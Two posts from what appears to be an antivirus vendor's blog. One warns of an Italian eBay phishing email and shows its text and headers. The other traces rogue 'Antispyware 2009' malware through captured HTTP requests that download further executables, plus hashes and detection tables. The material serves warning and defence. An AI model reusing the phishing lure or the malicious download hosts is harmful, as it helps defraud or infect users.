Promemoria eBay per oggetto non pagato numero

admin — Thu, 29 Jan 2009 22:59:06 +0000

We received again new false eBay emails that redirects the user to visit a webpage that is used to steals the user’s eBay account with a false webpage, similar to the original eBay homepage, that save the logi account typed by the user and send the sensitive data to the attacker.

Message

Promemoria eBay per oggetto non pagato numero 3104678753291

Gentile member,
alenf ha segnalato di non avere ancora ricevuto il pagamento per il seguente
oggetto: numero 3104678753291

Al momento non viene intrapresa alcuna azione nei confronti del tuo account.
Tuttavia, ti ricordiamo che quando fai un’offerta o acquisti un oggetto su eBay,
prendi un impegno vincolante con il venditore. Se la situazione non verr? risolta
entro 7 giorni dalla ricezione di questo promemoria, riceverai un ammonimento per
oggetto non pagato…

Header

Received: from hsenc.co.kr (unknown [211.215.20.40])
Received: from User (80.229.253.105)
by hsenc.co.kr (211.215.20.40) with [Nmail V3.6]
Subject: Promemoria eBay per oggetto non pagato numero 3104678753291
Date: Thu, 29 Jan 2009 15:25:31 -0000

Received: from 419revolution.org (unknown [211.106.23.71])
Received: from User ([])
by 419revolution.org (Merak 6.1.0)
Subject: Promemoria eBay per oggetto non pagato numero 292567831524
Date: Mon, 28 Jan 2009 14:38:18 -0000

Received: from mail.quike.com.cn (unknown [202.75.222.151])
Received: from User ([80.229.253.105])
by 211.155.233.151 with ESMTP
Subject: Hai ricevuto un ammonimento per Oggetto non pagato 260300220759
Date: Mon, 28 Jan 2009 14:38:18 -0000

Received: from topinfo.com.cn (unknown [211.157.2.61])
Received: from User [80.229.253.105] by topinfo.com.cn
Subject: Promemoria eBay per oggetto non pagato numero 299010852347
Date: Mon, 17 Nov 2008 10:51:59 -0000

Make sure to not fall in this scam, check always the address of the site before write sensitive data in web forms and analyze always the header of the emails.

Rogue Antispyware 2009 served through beedly.us ADS

admin — Thu, 13 Nov 2008 20:02:37 +0000

Today, when I was browsing the beedly.us website, I saw a suspicious ADS link where there was a link to the malicious website proantispyware2009(dot)com, so I started to analyze the link and, below, there is the result:

So after clicking on the ADS I was redirected to a new sub-domain:

and if we view the HTML code is possible to see that if we click in the remove button we will be prompted to download a file named setup_246_3777_.exe that is the real setup file of the rogue security software.

Report Generated 13.11.2008 at 20.33.51 (GMT 1)
Filename: setup_246_3777_.exe
File size: 112 KB
MD5 Hash: E9339F9045368947789EC70739DE4B21
SHA1 Hash: DC7B37C1158F5AD4D3E092AFCADE58A5E3FC145B
Application Type: Executable (EXE) 32bit
Detection Rate: 0 on 23

After I executed the .EXE file we started to get some new traffic:

GET /get/?type=scanner&pin=246&lnd=3777 HTTP/1.1
User-Agent: Installer
Host: dl.storage-antispyware.com
 
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=scanner_246_3777_.exe
Content-Transfer-Encoding: binary

From this traffic we can see that a new file is downloaded:

1	filename=scanner_246_3777_.exe

It is the installer for the rogue security software Antispyware 2009!

Report Generated 13.11.2008 at 21.24.07 (GMT 1)
Filename: scanner_246_3777_.exe
File size: 811 KB
MD5 Hash: E0F855C6C5FC93F0A8ED1FE9E702E492
SHA1 Hash: 77ACC5822A5EBD734075BDF4752EC6F10617050F
Detection Rate: 9 on 23

Antivirus Result
a-squared Trojan.Fakealert.ads.1!IK
Avira AntiVir TR/Fakealert.ads.1
Avast Win32:Spyware-gen [Trj] (0)
AVG Trojan horse SHeur.CQDP
BitDefender Trojan.FakeAlert.AKQ
ClamAV -
Comodo -
Dr.Web -
Ewido -
F-PROT 6 -
G DATA Win32:Spyware-gen [Trj] B
IkarusT3 Trojan.Fakealert.ads.1
Kaspersky -
McAfee PWCrack-Winspy trojan
NOD32 v3 -
Norman Aggressive commersial W32/AntiVirus2008.TB ()
Panda -
QuickHeal -
Solo Antivirus -
Sophos -
TrendMicro -
VBA32 -
VirusBuster -

Next, a new .EXE is downloaded and executed in my system:

GET /mxlivemedia/get_file.php HTTP/1.1
User-Agent: Installer
Host: 85.92.157.141
 
GET /mxlivemedia/multi/16.exe HTTP/1.1
User-Agent: Installer
Host: 85.92.157.141

and the file is:

1	Location: multi/16.exe

Report Generated 13.11.2008 at 20.39.42 (GMT 1)
Filename: 16.exe
File size: 598 KB
MD5 Hash: 9A785CF7901E348C1840925EB5E0C5CC
SHA1 Hash: 189EEA8FB44360C5E4011BB471D7F1D8F7B3F7AC
Detection Rate: 2 on 23

Antivirus Result
a-squared -
Avira AntiVir -
Avast -
AVG -
BitDefender Generic.Adw.Rotator.FF995C71
ClamAV -
Comodo -
Dr.Web -
Ewido -
F-PROT 6 -
G DATA -
IkarusT3 -
Kaspersky Trojan-Clicker.Win32.Agent.evi
McAfee -
NOD32 v3 -
Norman -
Panda -
QuickHeal -
Solo Antivirus -
Sophos -
TrendMicro -
VBA32 -
VirusBuster -

After 16.exe is executed we started to get new traffic from new hosts:

GET /stat.php?func=install&pid=246&ip=127.0.0.1&landing=3777
Host: int.vbvyu.com
 
GET /smb/nsi_install.php?inst_result=success&hwid=xxx
Host: a2.mxlivemedia.com
User-Agent: NSISDL/1.2 (Mozilla)
 
GET /bc/nsi_install.php?aff_id=mxlivemedia&inst_result=success&id=xxx
Host: a1.mxlivemedia.com
User-Agent: NSISDL/1.2 (Mozilla)

and after, IEXPLORE.EXE was executed hidden and the malware started to clickjack the ADS Links hidden!

GET /servlet/ajrotator/246392/0/vh?z=icm&dim=186262
Referer: http://a1.mxlivemedia.com/bc/ads/728x90/48dcc730ea0ce.html
Host: rotator.its.adjuggler.com
 
GET /servlet/ajrotator/7678/0/vh?z=ast&ch=7108&dim=56
Referer: http://a1.mxlivemedia.com/bc/ads/728x90/48e220b3afd5f.html
Host: servedby.topqualityads.net
 
GET /bc/ads/300x250/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com
 
GET /bc/ads/160x600/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com
 
GET /bc/ads/728x90/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
 
GET /bc/ads/728x90/48dcc730ea0ce.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com
 
POST /bc/123kah.php
Host: a1.mxlivemedia.com

After, new files was created in system32:

Report Generated 13.11.2008 at 20.50.00 (GMT 1)
Filename: msclgkhvhfp.dll
File size: 173 KB
MD5 Hash: 8532E92178E9126A151E31683D896C31
SHA1 Hash: 088E2728D8D7D5E185AF231F54D917605F7CED24
Detection Rate: 6 on 23

Antivirus Result
a-squared Generic.Adw.Rotator!IK
Avira AntiVir -
Avast -
AVG -
BitDefender Generic.Adw.Rotator.FF995C71
ClamAV -
Comodo -
Dr.Web -
Ewido -
F-PROT 6 -
G DATA Trojan-Clicker.Win32.Agent.evi A
IkarusT3 Generic.Adw.Rotator
Kaspersky Trojan-Clicker.Win32.Agent.evi
McAfee AdClicker-GI trojan
NOD32 v3 -
Norman -
Panda -
QuickHeal -
Solo Antivirus -
Sophos -
TrendMicro -
VBA32 -
VirusBuster -

Below there are the IEXPLORE.EXE connections:

And finally appeared the image of the rogue security software Antispyware 2009 in the screen:

I have created a small summary of the activity of what happened during this analysis:

And after reading the article of SophosLabs that steve has posted in the comments, I have analyzed with OllyDbg the file setup_246_3777_.exe and below there are some images:

Original Entry Point:

Now, if I follow the address CALL 0040116D, I arrive at the code shown in the image below:

And now, If I follow the address MOV EDX,00405DEC, I arrive at the code shown in image below, that is full of zero bytes (similar to the analysis of SophosLabs):

And for finish, below, I have added some images of the fake alerts shown by Pro Antispyware 2009:

Make sure to not fall in this scam, if your computer is infected with Antispyware 2009, it is recommended to remove it immediately and to scan your system with NoVirusThanks Malware Remover.

NoVirusThanks Blog » scam

Promemoria eBay per oggetto non pagato numero

Rogue Antispyware 2009 served through beedly.us ADS